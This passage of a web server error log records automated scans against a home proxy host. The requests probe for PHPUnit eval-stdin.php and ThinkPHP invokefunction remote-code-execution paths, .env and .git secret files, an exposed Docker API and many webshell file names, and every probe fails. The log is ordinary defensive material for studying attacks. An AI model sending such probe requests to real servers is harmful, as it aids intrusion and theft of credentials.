"/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:08 [error] 373#373: *43473 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:13 [error] 373#373: *43473 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:16 [error] 373#373: *43473 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:17 [error] 373#373: *43473 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:18 [error] 373#373: *43473 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:20 [error] 373#373: *43473 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:27 [error] 373#373: *43473 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:29 [error] 373#373: *43473 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:30 [error] 373#373: *43473 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:31 [error] 373#373: *43473 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:32 [error] 373#373: *43473 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:32 [error] 373#373: *43473 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:35 [error] 373#373: *43473 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:36 [error] 373#373: *43473 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:38 [error] 373#373: *43473 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:41 [error] 373#373: *43473 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:46 [error] 373#373: *43473 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:47 [error] 373#373: *43473 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:58:59 [error] 373#373: *43473 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 18:59:05 [error] 373#373: *43473 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 144.31.230.208, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 19:08:30 [error] 372#372: *44963 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 19:46:43 [error] 372#372: *44972 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.55.94.78, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 20:36:31 [error] 208#208: *1 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 20:47:20 [error] 209#209: *1492 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 206.168.34.53, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191" +2026/01/29 20:47:22 [error] 209#209: *1493 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 21:58:23 [error] 211#211: *1518 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 22:41:32 [error] 208#208: *1534 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:32 [error] 208#208: *1535 open() "/var/www/html/.env.mailer_url" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.mailer_url HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1536 open() "/var/www/html/.env-test-stage" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-test-stage HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1537 open() "/var/www/html/.env.local.dist" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.local.dist HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1538 open() "/var/www/html/.env-import.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-import.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1539 open() "/var/www/html/.env-test-suite" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-test-suite HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1540 open() "/var/www/html/.env.live.local" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.live.local HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1541 open() "/var/www/html/.env-threaddump" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-threaddump HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1542 open() "/var/www/html/.env-health.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-health.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1543 open() "/var/www/html/.env-header.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-header.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1544 open() "/var/www/html/.env-csrf-token" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-csrf-token HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:33 [error] 208#208: *1545 open() "/var/www/html/.env-gitmodules" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-gitmodules HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 208#208: *1546 open() "/var/www/html/.env-gitlab.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-gitlab.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 208#208: *1547 open() "/var/www/html/.env-github.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-github.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 208#208: *1548 open() "/var/www/html/.env-server.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-server.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 210#210: *1549 open() "/var/www/html/.env-sample.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-sample.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 210#210: *1550 open() "/var/www/html/.env-prod-local" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-prod-local HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 210#210: *1551 open() "/var/www/html/.env-token-list" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-token-list HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 210#210: *1552 open() "/var/www/html/.env-controller" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-controller HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 210#210: *1553 open() "/var/www/html/.env-tokens.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-tokens.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:34 [error] 210#210: *1554 open() "/var/www/html/.env-spider.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-spider.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:35 [error] 211#211: *3042 open() "/var/www/html/.env-buildtools" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-buildtools HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:35 [error] 211#211: *3043 open() "/var/www/html/.env-top100.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-top100.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 211#211: *3044 open() "/var/www/html/.env.mailer_dsn" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.mailer_dsn HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 211#211: *3045 open() "/var/www/html/.env-export.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-export.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 211#211: *3046 open() "/var/www/html/.env.php-backup" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.php-backup HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 211#211: *3047 open() "/var/www/html/.env.config.bak" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.config.bak HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 211#211: *3048 open() "/var/www/html/.env-top500.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-top500.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 208#208: *3049 open() "/var/www/html/.env-runner.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-runner.log HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:41:36 [error] 208#208: *3050 open() "/var/www/html/.env-config.yml" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-config.yml HTTP/1.1", host: "91.82.215.191" +2026/01/29 22:53:18 [error] 209#209: *3160 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 23:03:13 [error] 209#209: *3162 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 23:17:13 [error] 211#211: *3169 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 23:22:35 [error] 211#211: *3171 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:35 [error] 211#211: *3171 open() "/var/www/html/sa.php7" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /sa.php7 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:35 [error] 211#211: *3171 open() "/var/www/html/gettest.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /gettest.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:36 [error] 211#211: *3171 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:36 [error] 211#211: *3171 open() "/var/www/html/bjfl.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /bjfl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:36 [error] 211#211: *3171 open() "/var/www/html/sko.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /sko.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:36 [error] 211#211: *3171 open() "/var/www/html/obfuscate.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /obfuscate.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:37 [error] 211#211: *3171 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:37 [error] 211#211: *3171 open() "/var/www/html/co.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /co.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:37 [error] 211#211: *3171 open() "/var/www/html/iswfg.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /iswfg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:37 [error] 211#211: *3171 open() "/var/www/html/acxx.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /acxx.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:38 [error] 211#211: *3171 open() "/var/www/html/black.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /black.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:38 [error] 211#211: *3171 open() "/var/www/html/up.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /up.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:38 [error] 211#211: *3171 open() "/var/www/html/wikindex.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wikindex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:38 [error] 211#211: *3171 open() "/var/www/html/tool.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /tool.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:38 [error] 211#211: *3171 open() "/var/www/html/py.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /py.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:39 [error] 211#211: *3171 open() "/var/www/html/155.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /155.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:39 [error] 211#211: *3171 open() "/var/www/html/sym404.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /sym404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:39 [error] 211#211: *3171 open() "/var/www/html/iko.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /iko.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:39 [error] 211#211: *3171 open() "/var/www/html/wefile.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wefile.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:40 [error] 211#211: *3171 open() "/var/www/html/gfd.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /gfd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:40 [error] 211#211: *3171 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:40 [error] 211#211: *3171 open() "/var/www/html/bnm.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /bnm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:40 [error] 211#211: *3171 open() "/var/www/html/edit-tags.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /edit-tags.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:41 [error] 211#211: *3171 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:41 [error] 211#211: *3171 open() "/var/www/html/lkj.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /lkj.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:41 [error] 211#211: *3171 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:41 [error] 211#211: *3171 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:42 [error] 211#211: *3171 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /about/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:42 [error] 211#211: *3171 open() "/var/www/html/wp-includes/block-patterns/index.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:42 [error] 211#211: *3171 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:42 [error] 211#211: *3171 open() "/var/www/html/readme.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /readme.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:42 [error] 211#211: *3171 open() "/var/www/html/wp-includes/js/codemirror/index.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/js/codemirror/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:43 [error] 211#211: *3171 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:43 [error] 211#211: *3171 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:43 [error] 211#211: *3171 open() "/var/www/html/.well-known/index.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /.well-known/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:43 [error] 211#211: *3171 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:44 [error] 211#211: *3171 open() "/var/www/html/wp-includes/images/wp-login.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/images/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:44 [error] 211#211: *3171 open() "/var/www/html/atx.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /atx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:44 [error] 211#211: *3171 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:44 [error] 211#211: *3171 open() "/var/www/html/wp-content/radio.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /wp-content/radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:45 [error] 211#211: *3171 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:45 [error] 211#211: *3171 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /admin.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:45 [error] 211#211: *3171 open() "/var/www/html/footer.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /footer.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:45 [error] 211#211: *3171 open() "/var/www/html/global.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /global.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:46 [error] 211#211: *3171 open() "/var/www/html/core.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /core.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:46 [error] 211#211: *3171 open() "/var/www/html/thoms.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /thoms.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 23:22:46 [error] 211#211: *3171 open() "/var/www/html/irc.js.php" failed (2: No such file or directory), client: 20.89.97.111, server: localhost-nginx-proxy-manager, request: "GET /irc.js.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 00:29:28 [error] 209#209: *4689 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/30 00:51:06 [error] 209#209: *4694 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 01:16:16 [error] 209#209: *4707 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.193.184.23, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 01:16:16 [error] 209#209: *4707 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 4.193.184.23, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/30 02:09:54 [error] 211#211: *4733 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 02:29:40 [error] 208#208: *4748 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.65.193.90, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/30 02:40:53 [error] 208#208: *4753 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 117.164.191.217, server: localhost-nginx-proxy-manager, request: "POST 